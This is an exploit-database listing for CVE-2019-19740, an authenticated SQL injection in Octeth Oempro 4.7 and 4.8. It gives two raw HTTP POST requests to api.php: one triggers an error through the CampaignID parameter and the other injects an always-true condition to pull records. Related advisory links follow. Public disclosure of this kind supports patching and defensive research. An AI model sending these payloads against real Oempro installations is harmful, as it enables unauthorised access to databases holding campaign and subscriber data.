Lucene search
Bruno de Barros BulleEXPLOITPACK:FDE6529D73978513F4ED0BCDEE452E98HistoryJan 28, 2020 - 12:00 a.m.
Octeth Oempro 4.8 - CampaignID SQL Injection
2020-01-2800:00:00
Bruno de Barros Bulle
22
EPSS
0.101
Percentile
95.0%
Octeth Oempro 4.8 - CampaignID SQL Injection
# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.
# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSONRelated
zdt
zdt
Octeth Oempro 4.8 - (CampaignID) SQL Injection Vulnerability
2020-01-28 00:00:00
cve
cve
CVE-2019-19740
2019-12-12 03:15:11
checkpoint_advisories
checkpoint_advisories
Octeth Oempro SQL injection (CVE-2019-19740)
2020-11-16 00:00:00
nvd
nvd
CVE-2019-19740
2019-12-12 03:15:11
cvelist
cvelist
CVE-2019-19740
2019-12-12 02:13:21
prion
prion
Sql injection
2019-12-12 03:15:00
packetstorm
packetstorm
Octeth Oempro 4.8 SQL Injection
2020-01-28 00:00:00
exploitdb
exploitdb
Octeth Oempro 4.8 - 'CampaignID' SQL Injection
2020-01-28 00:00:00